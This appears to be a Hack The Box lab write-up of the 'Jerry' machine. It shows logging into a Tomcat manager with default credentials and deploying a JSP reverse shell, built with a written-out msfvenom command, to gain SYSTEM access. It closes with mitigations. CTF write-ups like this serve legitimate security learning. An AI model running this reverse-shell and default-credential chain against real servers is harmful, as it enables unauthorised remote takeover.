HTB: Jerry Writeup w/o Metasploit
Introduction
Welcome back to another HTB writeup. This time we’re exploring a machine named Jerry. This was definitely one of HTB’s easier boxes to exploit. Nonetheless, it was a good learning experience for me to learn more about java exploits and how to mitigate them. Here is a video walkthrough for this writeup.
Recon
For starters we kicked off a nmap scan that shows port 8080 is open.
Port 8080 is open and it appears to be running Tomcat version 7.0.88. Before opening a web browser and assessing what’s on the page there, let’s talk about how I rushed the process. After I saw what version the sever was running, I started doing some Google Kung FU to see if there was anything on the internet about this Tomcat 7.0.88. And there were a few results that came up. For instance, CVE-2017–12617 and CVE-2019–0232 both target vulnerable versions of Tomcat.
I tried both and none of them worked. I had a feeling CVE-2017–12617 wouldn't work because our version of Tomcat wasn’t listed as being vulnerable to this exploit. Furthermore, I just couldn’t get CVE-2019–0232 to work against the box. Now, instead of going straight for the kill with these exploits, I should’ve stuck to our typical process which is enumerating the web page a bit more to find other vulnerabilities or information we can use to exploit the box.
Enumeration
So, let’s not rush the process and stick to our normal procedures. Lets navigate to the web page on port 8080.
After getting to the webpage, there were three buttons that stood out to me the most. That was the server status, manager app, and host manager buttons. So, one by one I started clicking them. They all asked for a username and password.
I hit “cancel” with the intentions of searching for default usernames and passwords for Apache Tomcat 7.0.88. But when you hit cancel it returns a 401 HTTP Response with some additional information.
Essentially it is telling us how to map roles to a user; roles are typically how you group access and permission. Now, instead of searching for default credentials I just used what was provided in this 401 error and it worked. “tomcat” was the username, and “s3cret” was the password. These are also default credentials you can find from a Google search.
Now, depending on which button you clicked to authenticate with those credentials, you’ll be on a specific page. I clicked on the Manager App and it brings us here.
Exploitation
If you analyze this page and scroll down a bit, you’ll see there’s an option to upload a war file. War files are simply a collection of jar files to make deploying a web application more simple; same concept that containers (Docker) use to deploy applications.
Fortunately, we can use msfvenom to create a war file. We can do that with this here “msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.5 lport=1234 -f war -o rshell.war.”
Afterwards, upload this file on the manager app using the “Browse” button and then click deploy. We should see our reverse shell listed as an application .Next, lets start up a netcat listener to listen on the port you selected for the msfvenom reverse shell.
All we have to do now is execute the reverse shell. To do that just click on the application (rshell), then we should get a connection to our listener. And fortunately, we get a shell as system.
Conclusion
This was a pretty simple box to exploit. I enjoyed it because I recently setup a new instance of kali here on my local machine. So, it gave me a chance to figure out what tools I may have been missing and if my scripts (nmap scripts) were working properly.
AAR
To mitigate our attack methods,
- (1)first and foremost changing the default credentials to Tomcat is imperative. This here would prevent us from having access to the manager app.
- (2) The 401 error message shouldn’t disclose information about credentials, roles, and groups.
- (3) Furthermore, we should recommend updating this version of Tomcat to something more secure. There are other exploits that could potentially work against this box, such as denial of service and remote execution attacks.
Hopefully, you enjoyed this writeup. If you did, please let me know by leaving a clap or comment, it is greatly and deeply appreciated. Thank you for reading. Here is a video walkthrough of Jerry for my visual learners. Thanks again.
